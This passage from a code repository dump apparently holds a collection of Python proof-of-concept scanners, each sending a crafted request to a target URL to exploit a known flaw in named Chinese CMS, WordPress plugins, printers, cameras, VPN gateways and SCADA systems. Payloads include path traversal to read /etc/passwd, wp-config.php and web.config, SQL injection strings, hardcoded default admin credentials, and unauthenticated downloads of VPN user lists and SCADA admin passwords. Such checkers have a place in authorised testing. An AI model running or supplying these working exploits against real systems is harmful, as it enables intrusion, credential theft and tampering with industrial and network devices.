30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = wecenter_topic_id_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/weway/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/weway/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/weway/weway_PictureView1_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 任我行crm任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0134737
6 | author: Lucifer
7 | description: 文件Common/PictureView1中,参数picurl存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class weway_PictureView1_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/crm/Common/PictureView1/?picurl=/web.config"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在任我行crm任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = weway_PictureView1_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/wizbank/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wizbank/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wizbank/wizbank_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇思学习管理系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0149619
6 | author: Lucifer
7 | description: \www\cw\skin1\jsp\download.jsp源码中,未经过文件类型检查和过滤,直接下载文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wizbank_download_filedownload_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if req.headers["Content-Type"] == "application/xml":
25 | cprint("[+]存在wizbank学习管理系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = wizbank_download_filedownload_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wordpress/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress admin-ajax.php任意文件下载
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_admin_ajax_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"DB_NAME" in req.text and r"DB_USER" in req.text:
27 | cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress插件跳转
5 | referer: unknown
6 | author: Lucifer
7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_url_redirect_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"www.baidu.com" in req.text:
27 | cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = wordpress_url_redirect_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/xplus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/xplus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/yonyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/yonyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_ehr_ELTextFile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友EHR 任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-066512
6 | author: Lucifer
7 | description: 文件/hrss/ELTextFile.load.d中,参数src存在任意文件读取漏洞,可获取敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yonyou_ehr_ELTextFile_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml" and r"" in req.text:
27 | cprint("[+]存在用友EHR 任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yonyou_ehr_ELTextFile_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_getemaildata_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友CRM系统任意文件读取
5 | referer: http://wooyun.org/bugs/wooyun-2015-0137503
6 | author: Lucifer
7 | description: 文件/ajax/getemaildata.php中,参数filePath未过滤存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yonyou_getemaildata_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"patch" in req.text:
27 | cprint("[+]存在用友CRM系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yonyou_getemaildata_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_nc_NCFindWeb_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友nc NCFindWeb 任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0148227
6 | author: Lucifer
7 | description: 文件NCFindWeb参数filename存在任意文件读取漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yonyou_nc_NCFindWeb_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在用友nc NCFindWeb 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yonyou_nc_NCFindWeb_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_test_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友致远A6 test.jsp SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0155953
6 | author: Lucifer
7 | description: /yyoa/common/js/menu/test.jsp 文件中S1 参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yonyou_test_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yyoa/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在用友致远A6 test.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yonyou_test_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_user_ids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友致远A6协同系统SQL注射union可shell
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0106478
6 | author: Lucifer
7 | description: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?参数user_ids存在注入,可GETSHELL。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yonyou_user_ids_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在用友致远A6 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yonyou_user_ids_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/zfsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/cms/zuitu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/zuitu/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/camera/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/camera/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/camera/camera_hikvision_web_weak.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 海康威视web弱口令
5 | referer: http://www.myhack58.com/Article/html/2/5/2014/55637.htm
6 | author: Lucifer
7 | description: 海康威视摄像头web界面存在通用弱口令12345。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class camera_hikvision_web_weak_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
21 | "Authorization":"Basic YWRtaW46MTIzNDU="
22 | }
23 | payload = '/PSIA/Custom/SelfExt/userCheck'
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"200" in req.text and r"OK" in req.text:
28 | cprint("[+]存在康威视web弱口令漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:12345", "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = camera_hikvision_web_weak_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hardware/firewall/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/firewall/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/gateway/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/gateway/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/gateway/adtsec_Overall_app_js_bypass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: SJW74系列安全网关 和 PN-2G安全网关信息泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件stat/Overall_app.jsp中,禁用js可泄露敏感信息。因为页面采用的js加载请求服务,对身份进行了简单的验证 ,可以绕过。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class adtsec_Overall_app_js_bypass_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/stat/Overall_app.jsp"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"include/highCharts/js/highcharts.js" in req.text and r"ExportAppPDFServlet" in req.text:
27 | cprint("[+]存在SJW74系列安全网关 和 PN-2G安全网关信息泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = adtsec_Overall_app_js_bypass_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/printer/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_canon_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 佳能打印机未授权漏洞
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-114364
6 | author: Lucifer
7 | description: 佳能打印机未授权可远程打印。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class printer_canon_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "Authorization":"Basic MTExMTE6eC1hZG1pbg==",
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/twelcome.cgi"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"media/b_ok.gif" in req.text and r"_top.htm" in req.text:
28 | cprint("[+]存在佳能打印机未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = printer_canon_unauth_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_topaccess_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 东芝topaccess打印机未授权漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 8080端口服务web未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class printer_topaccess_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | port = 8080
23 | payload = "/TopAccess/default.htm"
24 | vulnurl = self.url + ":" + str(port) + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"Device/Device.htm" in req.text and r"/TopAccess/js/LoadTopMenu.js" in req.text:
28 | cprint("[+]存在东芝topaccess打印机未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = printer_topaccess_unauth_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_xerox_default_pwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 富士施乐打印机默认口令漏洞
5 | referer: http://www.wooyun.org/bugs/WooYun-2016-196214
6 | author: Lucifer
7 | description: 默认配置不当/可远程查看打印记录并打印文件,可以通过Port9100和FTP服务进行打印。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class printer_xerox_default_pwd_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "Authorization":"Basic MTExMTE6eC1hZG1pbg==",
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/prop.htm"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"prconprhttp" in req.text and r"Fuji Xerox" in req.text:
28 | cprint("[+]存在富士施乐打印机默认口令漏洞...(高危)\tpayload: "+vulnurl+"\t11111:x-admin", "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = printer_xerox_default_pwd_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hardware/router/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/router/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/router/router_ruijie_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 锐捷VPN设备未授权访问漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/cgi-bin/authUser/authUserData.cgi中存在未授权漏洞,可下载任意vpn账号密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class router_ruijie_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/cgi-bin/authUser/authUserData.cgi?type=downloadUsers"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"filename=otp_user.csv" in req.headers['Content-Disposition']:
27 | cprint("[+]存在锐捷VPN设备未授权访问漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = router_ruijie_unauth_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/industrial/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/industrial/__init__.py
--------------------------------------------------------------------------------
/pocs/industrial/dfe_scada_conf_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 东方电子SCADA通用系统信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0131500
6 | http://www.wooyun.org/bugs/wooyun-2010-0131719
7 | author: Lucifer
8 | description: 敏感信息泄露,可获取管理员账号和口令。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class dfe_scada_conf_disclosure_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/modules/manage/server/requestWorkMode.php"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"productName" in req.text and r"adminPassword" in req.text:
28 | cprint("[+]存在东方电子SCADA通用系统信息泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = dfe_scada_conf_disclosure_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/industrial/industrialmain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 工业控制漏洞库
5 | referer: unknow
6 | author: Lucifer
7 | description: 包含所有industrial control漏洞类型,封装成一个模块
8 | '''
9 | #wireless
10 | from industrial.wireless_monitor_priv_elevation import wireless_monitor_priv_elevation_BaseVerify
11 | from industrial.rockontrol_weak import rockontrol_weak_BaseVerify
12 | from industrial.sgc8000_sg8k_sms_disclosure import sgc8000_sg8k_sms_disclosure_BaseVerify
13 | from industrial.zte_wireless_getChannelByCountryCode_sqli import zte_wireless_getChannelByCountryCode_sqli_BaseVerify
14 | from industrial.zte_wireless_weak_pass import zte_wireless_weak_pass_BaseVerify
15 | from industrial.sgc8000_deldata_config_disclosure import sgc8000_deldata_config_disclosure_BaseVerify
16 | from industrial.sgc8000_defaultuser_disclosure import sgc8000_defaultuser_disclosure_BaseVerify
17 | from industrial.dfe_scada_conf_disclosure import dfe_scada_conf_disclosure_BaseVerify
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_defaultuser_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000监控系统超管账号泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 文件defaultuser.xml中,泄露了超级管理员账号和密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class sgc8000_defaultuser_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/app/sg8k_rs/config/defaultuser.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml" and r"superadmin":
27 | cprint("[+]存在sgc8000监控系统超管账号泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = sgc8000_defaultuser_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_deldata_config_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000 监控系统数据连接信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 文件deldata_config.xml中,泄露了数据库连接信息。
8 | '''
